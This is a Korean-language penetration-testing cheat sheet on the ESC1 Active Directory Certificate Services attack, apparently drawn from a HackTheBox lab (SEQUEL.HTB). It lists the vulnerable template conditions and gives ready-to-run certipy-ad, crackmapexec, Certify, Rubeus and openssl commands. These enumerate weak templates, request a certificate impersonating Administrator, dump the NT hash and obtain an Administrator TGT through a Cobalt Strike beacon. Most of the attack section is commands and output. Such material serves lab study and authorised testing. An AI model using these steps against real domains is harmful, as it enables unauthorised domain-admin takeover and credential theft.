ESC1

ESC1 공격은 PKI 인증서 양식 중 몇가지 조건이 갖춰지면 일반 도메인 유저 권한에서 도메인 관리자 권한을 탈취할 수 있는 공격입니다. 요구되는 몇가지 조건은 다음과 같습니다.

속성

값

Enrollee Supplies Subject

True

Requires Manager Approval

False

Authorized Signatures Required

Enrollment Rights

하위 수준 도메인 사용자 또는 모든 사용자

속성이 가진 의미에 대해서 자세한 설명은 Attribute Description을 참조합니다. 위와 같은 속성값을 악용한 ESC1 공격 흐름은 최종적으로 다음과 같습니다.

인증서 주체를 Administrator 로 변조하여 인증서 생성 요청
Administrator의 인증서가 포함된 pfx 파일 획득
pfx 파일로부터 Administrator의 TGT 발급
PAC로부터 NT Hash 덤핑

Abuse

crackmapexec 혹은 certipy-ad를 사용해서 취약한 인증서 정보와 인증 서버 정보를 얻을 수 있습니다.

crackmapexec ldap <DC-IP> -u <USER> -p <PASS> -d <Domain> -M adcs

certipy-ad find -u <USER> -p <PASS> -dc-ip <DC-IP> -target <IP> -vulnerable -stdout -enabled

두가지 모두 인증 서버와 인증서 정보를 찾을 수 있지만

certipy-ad의 경우 -vulnerable 플래그를 통해서 취약점을 찾을 수 있습니다.

서버는 ESC1에 취약한 환경으로 출력된 텍스트 문서를 읽으면 다음과 같이 나옵니다.

Certificate Templates
    Template Name                       : UserAuthentication
    Display Name                        : UserAuthentication
    Certificate Authorities             : sequel-DC-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Enrollment Flag                     : PublishToDs
                                          IncludeSymmetricAlgorithms
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Client Authentication
                                          Secure Email
                                          Encrypting File System
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Validity Period                     : 10 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SEQUEL.HTB\Domain Admins

출력된 템플릿 정보에서는 ESC1 익스플로잇에 요구되는 4가지 조건이 모두 만족됩니다.

조건이 만족될 경우 certipy-ad를 통해서 공격이 가능합니다.

# 템플릿을 통한 Administrator pfx 파일 요청
certipy-ad req -u <USER> -p <PASS> -ca <CA> -target <DC FQDN> -template <Template> -upn Administrator -dc-ip <dc-ip>

# 발급된 Administrator pfx 파일을 통한 NT Hash 덤핑
certipy-ad auth -pfx <PFX File> -domain <Domain> -dc-ip <dc-ip>

# 취약한 템플릿 열거
beacon> execute-assembly C:\Tools\Certify.exe find /vulnerable

# 취약한 템플릿을 통한 Administrator 가장
beacon> execute-assembly C:\Tools\Certify.exe request /ca:<ca> /template:<Template> /altname:Administrator

# 개인키와 인증서를 복사하여 리눅스 환경에서 cert.pem 파일로 저장 후 openssl을 통해 pfx로 변환
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Enter Export Password: password123!
Verifying - Enter Export Password: password123!

# Rubeus에서 사용 가능한 Base64 포맷으로 변경
cat cert.pfx | base64 -w 0

# 인증서를 통한 TGT 발급
beacon> execute-assembly C:\Tools\Rubeus.exe asktgt /user:Administrator /certificate:<Base64 Encoded cert> /password:password123! /nowrap